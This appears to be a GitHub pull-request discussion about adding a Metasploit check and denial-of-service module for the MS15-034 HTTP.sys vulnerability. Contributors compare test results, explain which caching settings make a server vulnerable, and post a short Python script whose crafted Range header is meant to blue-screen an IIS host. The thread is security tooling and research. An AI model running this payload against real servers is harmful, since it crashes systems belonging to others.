Add MS15-034 (CVE-2015-1635) https.sys Request Handling Denial-of-Service (and check) #5150
Conversation
wchen-r7
changed the title
|
@wchen-r7 does this test crash the remote IIS / OS? |
|
I think I've found the answer here: https://ma.ttias.be/remote-code-execution-via-http-request-in-iis-on-windows/?hn
|
|
@andresriancho Hmm it never DOS'd my IIS boxes (I had 3 for testing at the time). But let me double check again, this time I try more requests... bbl. |
|
i tried the exploit against a bunch of servers at work and none of them crashed. Maybe you need a special configuration so the blue screen is triggered. |
|
So Bill and I tested the code against Windows 7. I tried testing on Windows Server 2008 (32-bit) and that didn't work for me. Another box with 403 everything couldn't either. I have heard binary_raider saying the code works for Windows Server 2012: https://twitter.com/binary_raider/status/588260892707545088 |
|
Another test: 1000 requests and no DOS. Maybe like @firefart said, has to be something specific. |
|
I found a guy saying it DOS'd for him: http://www.reddit.com/r/netsec/comments/32n3m2/cve20151635_rce_in_windows_httpsys/cqd680s So I'm gonna go ahead and add this in the description. Thanks all. |
|
Here is a video of a bluescreen on win2k12 |
|
@firefart Good find. Thanks! |
|
tried the output caching on win2k8 but I still can't trigger the bsod. I currently have no admin access to a win2k12 to try it out :( |
| return | ||
| end | ||
|
|
||
| if !res.headers['Server'].include?('Microsoft-IIS') |
There was a problem hiding this comment.
People may disable the server header. So maybe null, and also false negative.
Also may spoof it :)
There was a problem hiding this comment.
That's true. I think I'm just going to get rid of this check. It doesn't feel important when it has a more explicit way to check.
Thanks.
|
This won't cause a BSOD, try |
|
n.b. can this be written as an auxiliary/dos/ module with a check? |
|
You need to actually have some output caching rules enabled for this to work |
|
Worked for me against Windows 7 with default install of IIS... Did take a few triggers to BSOD. |
|
What does your "Output Caching" tab show? Before I could get the exploit to work I had to add a rule to Output Caching to cache stuff to the Kernel-mode cache. |
| 'Description' => %q{ | ||
| This module will check if your hosts are vulnerable to CVE-2015-1635 (MS15-034). A | ||
| vulnerability in the HTTP Protocol stack (HTTP.sys) that could result in arbitrary code | ||
| execution. Please note this module could potentially cause a denail-of-service against |
|
@wchen-r7 has this covered:
|
|
That youtube vid is mine, i have 2012r2x64 and 2008r2x64 here to test against. 2008r2x64 didn't blue screen, it just caused the box to lock up. 2012r2x64 resulted in BSOD. I've heard people saying caching needs to be enabled and populated to be vuln..... oh, and Hi Meatballs! |
| res = send_request_raw({ | ||
| 'uri' => uri, | ||
| 'method' => 'GET', | ||
| 'vhost' => 'stuff', |
There was a problem hiding this comment.
The module has a vhost option that doesn't appear to be used. Should this be changed in order to support VIP/virtual hosts?
There was a problem hiding this comment.
Actually I don't really need this, I'll get rid of this line. Thanks.
|
This is supposed to give blue screen #Tested on Win Srv 2012R2.
import socket,sys
if len(sys.argv)<=1:
sys.exit('Give me an IP')
Host = sys.argv[1]
def SendPayload(Payload, Host):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((Host, 80))
s.send(Payload)
s.recv(1024)
s.close()
#Make sure iisstart.htm exist.
Init = "GET /iisstart.htm HTTP/1.0\r\n\r\n"
Payload = "GET /iisstart.htm HTTP/1.1\r\nHost: blah\r\nRange: bytes=18-18446744073709551615\r\n\r\n"
SendPayload(Init, Host)
SendPayload(Payload, Host)via: https://twitter.com/PythonResponder/status/588364311422181376 |
wchen-r7
changed the title
* `check` to test, `run` to DoS
|
Test: Thanks @wchen-r7 ! |
| 'Description' => %q{ | ||
| This module will check if your hosts are vulnerable to CVE-2015-1635 (MS15-034). A | ||
| vulnerability in the HTTP Protocol stack (HTTP.sys) that could result in arbitrary code | ||
| execution. This module will try to cause a denail-of-service. |
There was a problem hiding this comment.
ah man. I need a spell checker for my text editor.
There was a problem hiding this comment.
Correction submitted: #5155
Thanks.
|
thank YOU @wchen-r7 for the quick turnaround on the PoC. |
|
is it vuln possible to execute shellcode meterpreter stager ? |
|
has anyone had any luck with running this against the WinRM service, which runs a HTTP service? could be another avenue to try. |
|
here is a translated version of an anlysis: It says Maybe we can try this out? |
|
Yes we can try. I can work on this again this Friday. |
|
From @Lee_Holmes: MS015-034 vulnerability requires that services use Kernel Mode Caching in http.sys. WinRM and PowerShell Remoting do not. |
|
blue screen on 2008r2 iis7.5 |
Network Discovery 5357 is also a HTTP.sys service, but was also not vuln. 😢 You can list available HTTP.sys services with |
|
I don't see any results on that command but someone on twitter, I forget who, provided this one: netsh http show servicestate and look for Registered URLS. This seems to provide usable data in my environment. |
|
Great FAQ page regarding this - https://isc.sans.edu/forums/diary/MS15034+HTTPsys+IIS+DoS+And+Possible+Remote+Code+Execution+PATCH+NOW/19583 |
|
One note on SANS FAQ - just because something uses HTTP.sys, doesn't mean it vuln to this. Kernel Mode Caching has to be called, which is pretty rare - e.g. IIS uses it for caching static content, and that's basically it. Also to clear up another common misconception, this is not an RCE issue. It's a single integer overflow. Stop buying into the Qualys etc hype - they're just speculating. |
|
Doh I meant N.b. pics on twitters of the tcp traffic indicates a memory leak - after the end of the response... |
|
Easily parsable with a PowerShell oneliner. |
|
A standalone python version. |
Edited modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb first landed in rapid7#5150, @wchen-r7's DOS module for CVE-2015-1635 HTTP.sys Edited modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb first landed in rapid7#5192, @joevennix's module for Safari CVE-2015-1126 Edited modules/auxiliary/gather/java_rmi_registry.rb first landed in Edited modules/auxiliary/gather/ssllabs_scan.rb first landed in rapid7#5016, add SSL Labs scanner Edited modules/auxiliary/scanner/http/goahead_traversal.rb first landed in rapid7#5101, Add Directory Traversal for GoAhead Web Server Edited modules/auxiliary/scanner/http/owa_iis_internal_ip.rb first landed in rapid7#5158, OWA internal IP disclosure scanner Edited modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb first landed in rapid7#5159, WordPress Mobile Edition Plugin File Read Vuln Edited modules/exploits/linux/http/multi_ncc_ping_exec.rb first landed in rapid7#4924, @m-1-k-3's DLink CVE-2015-1187 exploit Edited modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb first landed in rapid7#5131, WordPress Slideshow Upload Edited modules/exploits/windows/local/run_as.rb first landed in rapid7#4649, improve post/windows/manage/run_as and as an exploit (These results courtesy of a delightful git alias, here: ``` cleanup-prs = !"for i in `git status | grep modules | sed s/#.*modules/modules/`; do echo -n \"Edited $i first landed in \" && git log --oneline --first-parent $i | tail -1 | sed 's/.*Land //' && echo ''; done" ``` So that's kind of fun.
|
Small update on that one: I was tested a client's server using a custom script and the MSF module to check it, both reported the target as vulnerable. Then, the client applied the patch and I retested it with the same stuff and cURL. cURL reported it as fixed, the two others as vulnerable. After investigation, the remote server was still sending the cached response for my custom script and MSF based on the UserAgent being used. e.g: Not sure if this is the behaviour for all IIS or just a weird one I got :x Anyway, it might be useful to add a random string to the UA to avoid such FP when retesting :) |
|
Thanks for the info! |
|
@erwanlr Hmm I'm not able to reproduce the behavior you described. Here's the vulnerable response: Here's the patched response: Is it possible to give me more precise steps to reproduce this? (Including the server setup) |
|
I retested using the exact same options (RHOSTS, VHOST and TARGETURI - was a css file -, all others were default values) and noticed that is was still reported as vulnerable whereas using cURL it wasn't. Then, after playing with burp to determine what was going on, I found that when using the same User-Agent than the first check, the cached response was received. I don't know the server setup unfortunately, all I can say is that it was an IIS 7.5 (but that won't really help :/) If it was affecting all IIS, other people would have reported such weird behaviour, so I assume I just hit a unicorn :O |
|
OK, thanks! I will keep an eye on this and try to reproduce again. |
|
If I recall correctly the patch requires a reboot. If the response is cached it is unlikely to be from the target. Perhaps a proxy? Or a test against a patched but not rebooted server? Tom
|
|
Ahhh, that must be the not rebooted server case as it was fixed during testing and the client didn't inform me of such thing. |
I didn't do much, I found a work-in-progress code here: http://pastebin.com/raw.php?i=ypURDPc4
I tested it and worked on my IIS:
So I ported that to Metasploit. This MSF module can do two things:
Here's how you can test it:
.htmextension for kernel-mode caching too during testing,but this may not be necessary.Of if you see me in person, you can use my box, too.